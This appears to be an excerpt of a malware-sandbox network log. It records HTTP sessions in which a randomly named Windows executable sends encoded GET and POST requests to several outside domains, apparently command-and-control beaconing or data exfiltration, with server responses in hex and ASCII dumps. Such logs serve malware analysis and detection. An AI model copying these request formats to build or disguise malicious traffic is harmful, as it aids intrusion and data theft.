Z [TRUNCATED]
                                            Jul 3, 2024 18:54:23.050549984 CEST1236INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:54:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/7.4.33
                                            Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=756559287fe03a4415a77fd29eb7083c%7C%7C1720198462%7C%7C1720194862%7C%7C3fd2ead987855aa39d85578e2a4e75dd; expires=Fri, 02-Aug-2024 16:54:22 GMT; Max-Age=2592000; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Set-Cookie: PHPSESSID=srdaoiq9gdvc81bcuceegectf2; path=/
                                            Pragma: no-cache
                                            Link: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"
                                            Content-Encoding: gzip
                                            Data Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 [TRUNCATED]
                                            Data Ascii: 3156}v8|Q7{LI.'vwm$9:I)qVH$%o;P(X|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!)*,l`9fP+y"v*JTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n
                                            Jul 3, 2024 18:54:23.050573111 CEST1236INData Raw: 34 db ea fb d4 9f 3c 80 3e cb 31 ec c8 64 82 5d a6 15 84 25 05 29 a6 14 64 7a 4a 6d a3 58 2f d6 97 53 cb 2b 72 ea b8 a6 b0 0c 8d b3 40 13 b4 43 bb d0 9d 78 ac e7 a0 76 7e 28 fd f4 67 d2 1d 59 01 19 58 88 11 10 1a c1 b4 18 32 87 f9 34 64 26 f9 a9
                                            Data Ascii: 4<>1d]%)dzJmX/S+r@Cxv~(gYX24d&Cq~!{[?W}j}(ZZTUUM|>5(!^Ftad-Z#=j3ik&wAx^VW{--WlmF5:%RH)~x-FvV`q5'
                                            Jul 3, 2024 18:54:23.050578117 CEST448INData Raw: 32 79 fd 60 e4 f9 6a 59 12 31 db 92 3d 40 2c a6 95 32 e9 7d 28 ec 5c ad 4c 5c 61 fb 3e 08 54 54 49 41 14 73 7e de cd f3 75 c1 ef f3 0c 9a e0 29 8d ac ac 1f 9e d2 c8 72 ad f1 14 f4 d5 74 c9 53 5a 78 b8 86 79 4a 6b 4f d2 3b cf d8 f0 ca da e8 49 6d
                                            Data Ascii: 2y`jY1=@,2}(\L\a>TTIAs~u)rtSZxyJkO;Im>BG=}(,gOZM-}K_E=|u]t#PWm@~N{D+OeOopu=TYGweu&2u;kvW>XESD*:FCZZYWI^|-?x-O[CN)
                                            Jul 3, 2024 18:54:23.050668955 CEST1236INData Raw: 35 64 d7 c0 f5 c7 c9 25 34 8e cb ef 56 21 76 20 5d f9 82 bf b5 62 e5 29 b7 be 04 cd 06 f5 c3 97 a2 19 6b c2 d6 68 d8 c3 46 9e 95 f6 80 51 df 18 c1 1c 71 cd c8 78 39 fa 95 56 9e d2 81 e9 75 54 ea 59 c5 3b 7e b3 75 d5 8b aa 9f 03 d7 81 c2 a5 1d 09
                                            Data Ascii: 5d%4V!v ]b)khFQqx9VuTY;~u7A@zm|,]=\_KRw{{}X](,ZBN |([dmvpGWhCuY6I@X^@du_
                                            Jul 3, 2024 18:54:23.050769091 CEST1236INData Raw: a1 2f 76 40 c5 01 6c d0 03 03 0f 53 e3 2d 11 fd 9a 3f a2 2b 61 28 bb eb 54 a0 e5 d5 97 18 fa 4f a7 4f 31 7d 9f 85 4a 0e f8 00 5a e7 46 65 e0 ba a1 ba 21 c9 5c 6e a4 7e c6 b5 72 bb 81 65 5c 87 91 51 5d ec d8 37 e5 94 47 f0 56 b4 09 95 93 66 4d 8a
                                            Data Ascii: /v@lS-?+a(TOO1}JZFe!\n~re\Q]7GVfMW|7a6$?#K$ y]:h<]Sx-%wl|SUy\GjjG17^npC41s!3b>[O(32u-Eejp w=HB|]NkjhQj
                                            Jul 3, 2024 18:54:23.050776958 CEST1236INData Raw: 37 9d a7 39 8b 59 d0 dc fd da ce 62 32 1e 46 ad ed cc a6 01 cc 7c 21 ab 20 2d 8a 0a 80 1c bd 18 5f 8d e6 17 72 a5 39 5f 2d e9 95 52 a5 5d aa b6 f5 66 b5 5d 6f d7 f5 01 6b 99 55 a3 d2 af f6 db 75 46 75 a3 4e 59 9b d2 7a b9 49 ab 46 ab a5 89 45 9d
                                            Data Ascii: 79Yb2F|! -_r9_-R]f]okUuFuNYzIFEAbCQ+gCfb2E/<Eo{o%=tOyL.c#xL\!p0;O+O"-k2\QVkL#CzQ{0+#B.97X5rAtgMzk9P
                                            Jul 3, 2024 18:54:23.050978899 CEST1236INData Raw: 57 7d 39 13 d5 c2 47 47 44 b8 1d ad 6a 6a 1e 0f 70 3c c0 d8 d1 a1 3b d1 06 ae 8f 5a f0 7b b6 47 2b 65 5d 6f e8 cd 66 43 1b d3 fb 97 d1 73 6f 66 3c 22 d5 03 72 89 3c 22 47 c0 23 d2 75 27 04 78 84 1a 2f f8 e3 14 ea ff 03 af 6b ed bf f6 ce 42 bd fa
                                            Data Ascii: W}9GGDjjp<;Z{G+e]ofCsof<"r<"G#u'x/kBfmuUs=c<jc(Z;+gI]AV\4FYLF|5i+%Vo4V`FdFtPPZ})a7FodqKFraV|q@U*b
                                            Jul 3, 2024 18:54:23.050987005 CEST1236INData Raw: 8e 31 27 35 12 d4 1c 3a 86 59 00 75 a6 8d 4d ad c6 3f dc db 5a ad 90 b1 28 bf 1e d5 93 b1 00 99 af 67 95 52 9a 70 58 da 7a aa 94 f7 a6 51 f0 50 03 aa ec 7a 89 3f 53 27 19 36 17 ba 5b b9 0a 77 27 2f 77 51 dc 57 a6 a1 e4 e5 b2 64 27 bb 40 9a c1 91
                                            Data Ascii: 1'5:YuM?Z(gRpXzQPz?S'6[w'/wQWd'@nE$;Hv0boyK^W]pUH"o\Q\zW6/]+{\)vtY z2nBe9\9$Ln&g^~xr)n>'+G6+"
                                            Jul 3, 2024 18:54:23.051018953 CEST1236INData Raw: 88 e2 02 f6 ad 42 ea 5b 05 16 33 33 31 5d db 1d f7 ad 19 a5 6f 2f 05 e0 c7 53 19 f0 a3 02 78 0a 2d eb 65 33 1b f4 0b 83 b5 fc 8a 79 51 1f f6 59 e4 d4 f5 23 07 24 09 30 39 f6 3f 76 e5 61 62 63 2f 9c 28 f0 98 9f 09 0d da 0b c4 9e ec 0e 40 65 00 d5
                                            Data Ascii: B[331]o/Sx-e3yQY#$09?vabc/(@eGd q`(C^e9:WU0;xOCZLV2^HEEr%2Qff|D<ffDr~y-7r1apey
                                            Jul 3, 2024 18:54:23.051026106 CEST776INData Raw: 2f de 41 ef 9f 1d 65 fa 52 ae 8f 56 70 a4 a0 77 8e b8 03 8c fb 8c ef eb 24 eb b0 95 44 c7 4a ec aa b9 38 c9 76 ab 60 66 e6 9e f7 e2 04 5d 29 27 02 e5 6a 5f 46 59 dc 9d e5 19 d4 fb 2e 18 be 60 0b 70 af 84 6b e3 86 7c 50 45 3f cd d5 be 00 bf 56 5c
                                            Data Ascii: /AeRVpw$DJ8v`f])'j_FY.`pk|PE?V\4]4NqO;}1&r00"q/P@S=Pl?4/'8u(<t!<]2f`fwg8xCf+yN*t1!B7
                                            Jul 3, 2024 18:54:23.055552006 CEST1236INData Raw: d8 cf b5 42 dd b1 eb 4b 86 0d 00 09 c0 4b c5 9f 7f f9 20 7f fe 85 eb cf f9 f3 01 4e c0 be 97 e5 ea 54 d9 21 40 5e de 78 45 77 38 fd 13 b1 82 c2 02 50 51 a3 a7 8a 1a 3d cd 57 a3 fb 74 32 06 fa 92 f5 38 99 02 a7 b1 2e 3d fd 28 1f 36 9f 7e 4c 5b f3
                                            Data Ascii: BKK NT!@^xEw8PQ=Wt28.=(6~L[amL.sU8%weMp_38: DloAjE+SdX_Lx}H}%3LQ3<#/+g*sy\r,XR18S,OLYc~ w^4,E/"PRsE


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.64975323.105.172.12805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:24.469583988 CEST486OUTGET /hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.primefindsstore.shop
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:54:25.381266117 CEST813INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:54:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 0
                                            Connection: close
                                            X-Powered-By: PHP/7.4.33
                                            Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=1c4e7a7306f0d02632d76f4d715bcb0d%7C%7C1720198465%7C%7C1720194865%7C%7C58b4abfabd66bd49e0cce7a8633a7e96; expires=Fri, 02-Aug-2024 16:54:25 GMT; Max-Age=2592000; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Set-Cookie: PHPSESSID=gu2v2lqtpnq0r4oilotonre57s; path=/
                                            Pragma: no-cache
                                            X-Redirect-By: WordPress
                                            Location: http://primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.649754185.151.30.199805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:38.809283018 CEST736OUTPOST /lxk5/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.salecost.co.uk
                                            Origin: http://www.salecost.co.uk
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.salecost.co.uk/lxk5/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 2b 68 52 45 64 38 65 48 71 42 46 50 74 79 32 74 78 69 66 72 41 71 63 79 78 6b 72 48 38 61 43 4f 65 49 74 6d 41 32 36 34 31 31 79 4f 64 62 67 48 30 6e 4d 31 7a 4f 65 72 6a 35 79 47 43 37 56 62 33 57 31 35 4a 76 6f 32 62 79 54 39 58 75 51 78 50 31 54 6a 4f 45 58 78 76 5a 6c 46 66 4b 78 6a 76 54 57 33 4c 6f 64 62 48 39 4a 6a 32 76 76 59 41 53 64 41 52 69 67 4d 69 53 58 66 6d 74 4b 53 53 46 2b 49 6f 79 6f 4c 75 72 64 6c 4e 33 54 34 77 73 63 74 55 6a 50 63 5a 6b 63 4f 2b 64 62 62 63 4a 30 6c 42 78 51 4f 56 46 4a 4d 70 4c 45 4f 32 55 35 71 6c 58 31 4c 38 31 6c 74 61 69 2f 32 36 38 54 73 31 34 61 6b 39 34 37 79
                                            Data Ascii: Z6ZTG=+hREd8eHqBFPty2txifrAqcyxkrH8aCOeItmA26411yOdbgH0nM1zOerj5yGC7Vb3W15Jvo2byT9XuQxP1TjOEXxvZlFfKxjvTW3LodbH9Jj2vvYASdARigMiSXfmtKSSF+IoyoLurdlN3T4wsctUjPcZkcO+dbbcJ0lBxQOVFJMpLEO2U5qlX1L81ltai/268Ts14ak947y
                                            Jul 3, 2024 18:54:39.578632116 CEST364INHTTP/1.1 404
                                            date: Wed, 03 Jul 2024 16:54:39 GMT
                                            server: Apache
                                            content-length: 196
                                            content-type: text/html; charset=iso-8859-1
                                            x-via: ASH1
                                            connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.649755185.151.30.199805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:41.338901043 CEST760OUTPOST /lxk5/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.salecost.co.uk
                                            Origin: http://www.salecost.co.uk
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.salecost.co.uk/lxk5/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 2b 68 52 45 64 38 65 48 71 42 46 50 72 53 71 74 33 42 33 72 52 36 63 78 2b 45 72 48 6d 71 43 4b 65 49 70 6d 41 7a 43 6f 31 68 65 4f 61 35 49 48 31 6c 30 31 2f 75 65 72 72 5a 79 44 4e 62 56 75 33 57 70 4c 4a 76 55 32 62 79 48 39 58 71 55 78 50 45 54 69 4d 55 58 4a 37 70 6c 55 52 71 78 6a 76 54 57 33 4c 6f 49 2b 48 37 68 6a 32 66 66 59 42 7a 64 44 50 79 67 4e 6c 53 58 66 33 64 4b 57 53 46 2b 75 6f 7a 30 6c 75 70 56 6c 4e 31 4c 34 7a 2b 30 71 61 6a 50 53 56 30 64 68 76 59 32 74 52 71 42 6e 45 48 5a 72 45 48 4e 73 73 39 46 55 71 6e 35 4a 33 48 56 4a 38 33 39 66 61 43 2f 63 34 38 72 73 6e 76 57 44 79 4d 65 52 72 6c 4a 39 4f 43 50 69 77 74 57 6b 31 61 70 4c 71 42 78 4e 2f 51 3d 3d
                                            Data Ascii: Z6ZTG=+hREd8eHqBFPrSqt3B3rR6cx+ErHmqCKeIpmAzCo1heOa5IH1l01/uerrZyDNbVu3WpLJvU2byH9XqUxPETiMUXJ7plURqxjvTW3LoI+H7hj2ffYBzdDPygNlSXf3dKWSF+uoz0lupVlN1L4z+0qajPSV0dhvY2tRqBnEHZrEHNss9FUqn5J3HVJ839faC/c48rsnvWDyMeRrlJ9OCPiwtWk1apLqBxN/Q==
                                            Jul 3, 2024 18:54:42.132993937 CEST364INHTTP/1.1 404
                                            date: Wed, 03 Jul 2024 16:54:42 GMT
                                            server: Apache
                                            content-length: 196
                                            content-type: text/html; charset=iso-8859-1
                                            x-via: ASH1
                                            connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.649756185.151.30.199805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:43.873456001 CEST1773OUTPOST /lxk5/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.salecost.co.uk
                                            Origin: http://www.salecost.co.uk
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.salecost.co.uk/lxk5/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 2b 68 52 45 64 38 65 48 71 42 46 50 72 53 71 74 33 42 33 72 52 36 63 78 2b 45 72 48 6d 71 43 4b 65 49 70 6d 41 7a 43 6f 31 67 4b 4f 64 4b 77 48 31 43 59 31 2b 75 65 72 6f 5a 79 43 4e 62 56 7a 33 57 68 31 4a 76 59 4d 62 78 2f 39 58 50 41 78 4e 32 72 69 47 55 58 4a 6b 35 6c 45 66 4b 77 35 76 54 47 37 4c 6f 59 2b 48 37 68 6a 32 63 48 59 48 69 64 44 4e 79 67 4d 69 53 58 44 6d 74 4c 42 53 47 50 62 6f 7a 78 51 76 59 31 6c 4e 56 62 34 38 74 63 71 57 6a 4f 30 57 30 64 35 76 59 79 2b 52 71 4e 64 45 48 45 4f 45 48 4a 73 76 4b 78 4b 33 46 70 2f 74 42 46 45 6b 46 42 31 63 45 2f 64 38 4d 2f 75 6f 39 43 4e 7a 34 43 43 73 54 64 68 46 52 33 6a 7a 65 57 31 32 50 6f 6d 38 67 59 56 6b 4d 71 6d 69 61 56 53 64 36 4d 44 6f 78 54 6c 71 38 7a 59 58 42 37 5a 46 78 52 53 7a 52 42 66 41 4c 43 6b 4a 32 2f 69 4c 6b 4a 2f 63 72 36 4c 34 4b 61 58 77 30 4f 61 68 46 67 38 58 55 43 6f 41 57 4c 72 62 69 79 56 38 41 4f 78 46 74 48 48 6a 65 36 61 31 57 56 42 32 61 36 68 55 64 51 6c 70 5a 50 6b 61 32 4e 43 41 64 76 59 [TRUNCATED]
                                            Data Ascii: Z6ZTG=+hREd8eHqBFPrSqt3B3rR6cx+ErHmqCKeIpmAzCo1gKOdKwH1CY1+ueroZyCNbVz3Wh1JvYMbx/9XPAxN2riGUXJk5lEfKw5vTG7LoY+H7hj2cHYHidDNygMiSXDmtLBSGPbozxQvY1lNVb48tcqWjO0W0d5vYy+RqNdEHEOEHJsvKxK3Fp/tBFEkFB1cE/d8M/uo9CNz4CCsTdhFR3jzeW12Pom8gYVkMqmiaVSd6MDoxTlq8zYXB7ZFxRSzRBfALCkJ2/iLkJ/cr6L4KaXw0OahFg8XUCoAWLrbiyV8AOxFtHHje6a1WVB2a6hUdQlpZPka2NCAdvYswEULDuLuTC9OMVTvTdcljMVpPgkOX5Sq5zMaDUBIsIPz0tB7iPEomcF95io6e22tIRsPVuS7acRJOSxA5Vk1nDpxZiWnPPEzQOoUWJAYmHmfxcwNPJMZ0Uog2TcGHaOEc98sjGfgrgkEsnmKjkl4Xt1b6lvoO51rqVL3W1So5ibBw8DySv4CRJ/+NxrZqT/XWXfMLyCYS9bYPdoGAtdaVWcwFmXKWCtCY6b6HBXeSomReuDZcEnBgEHthhUVcrT4KFt3ZalXeeyIMruqjzLOPh7h+5QFoqeIT6C6kJUFmF44kgmCY5AIjldlUFlm7YQH9sbL9gbNX5an2ouohL2Khz7V0hdaQ7JZJrWr2fST5iyTikghpIBR1uJ7j7Awlgd5+NlpsMkaufHH2J5PP5hESN73vpnKM8omzL2JmZNRPMItfzVns80blci0/j1jldsqXw75cR93RlSvkj+WYKoPKyC2DEkWzILmcs+k0PhUzI5ro4bAkhnftSrOqhOA/vKrHLX5JUVkBubXo/i0rkS+S8nkVP3mO8P6IMTU7EbbxfnZ5ZI+6FsOiMbGZSBkOaPn7+UkPoROYXmHhqSMbq3zDxuvOSpeti9pxZAe9Q7U+h3/uIZA0Lp719tco+bDiAuUSk/39byzf6RHkim++66g7CAvKKtuZ+qyG [TRUNCATED]
                                            Jul 3, 2024 18:54:44.660573959 CEST364INHTTP/1.1 404
                                            date: Wed, 03 Jul 2024 16:54:44 GMT
                                            server: Apache
                                            content-length: 196
                                            content-type: text/html; charset=iso-8859-1
                                            x-via: ASH1
                                            connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.649757185.151.30.199805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:46.405517101 CEST480OUTGET /lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.salecost.co.uk
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:54:47.172274113 CEST460INHTTP/1.1 404
                                            date: Wed, 03 Jul 2024 16:54:37 GMT
                                            content-type: text/html; charset=iso-8859-1
                                            transfer-encoding: chunked
                                            vary: Accept-Encoding
                                            server: Apache
                                            x-origin-cache-status: MISS
                                            x-cdn-cache-status: MISS
                                            x-via: ASH1
                                            connection: close
                                            Data Raw: 43 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: C4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.649759142.250.185.83805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:52.401451111 CEST751OUTPOST /odz6/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.bayviewcribbage.com
                                            Origin: http://www.bayviewcribbage.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.bayviewcribbage.com/odz6/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
